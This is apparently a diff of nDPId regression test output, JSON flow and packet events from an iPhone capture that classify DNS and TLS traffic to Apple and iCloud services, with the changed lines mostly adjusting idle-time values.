+00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454598759,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454598759,"pkt":"xGGLNYKpxiwDYGpkCABFAADQatgAAEARieLAqAIBwKgCEQA1wtgAvFoLcEmBgAABAAQAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAJGQAmCGluaXQtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAABEeABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAbAARfZRg1"} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADjlzEAAEARXXbAqAIBwKgCEQA10BgAz2vgCAuBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMPAAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOnACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXwAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAPAARce00awJMAAQABAAAADwAEXHtNQA=="} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADGO68AAEARuRXAqAIBwKgCEQA19D4AssJtjeyBgAABAAQAAAAAA2NsNAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAD1IAJQdjbDQtY2RuDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADAKwAFAAEAAABkABgDY2w1BWFwcGxlA2NvbQdlZGdla2V5wEvAXAAFAAEAABGWABoGZTE0ODY4BWRzY2U5CmFrYW1haWVkZ2XAS8CAAAEAAQAAAA8ABGhJPR4="} 00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454598885,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598885,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4434AAEABEeTAqAIRwKgCAQMDBHsAAAAARQAAz8hDAABAESx4wKgCAcCoAhEANfeRALsAAA=="} 00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4zMkAAEABKJnAqAIRwKgCAQMDKS0AAAAARQAAz3UJAABAEX+ywKgCAcCoAhEANdLfALsAAA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4CTAAAEAB7DLAqAIRwKgCAQMDOTMAAAAARQAA0GrYAABAEYniwKgCAcCoAhEANcLYALwAAA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p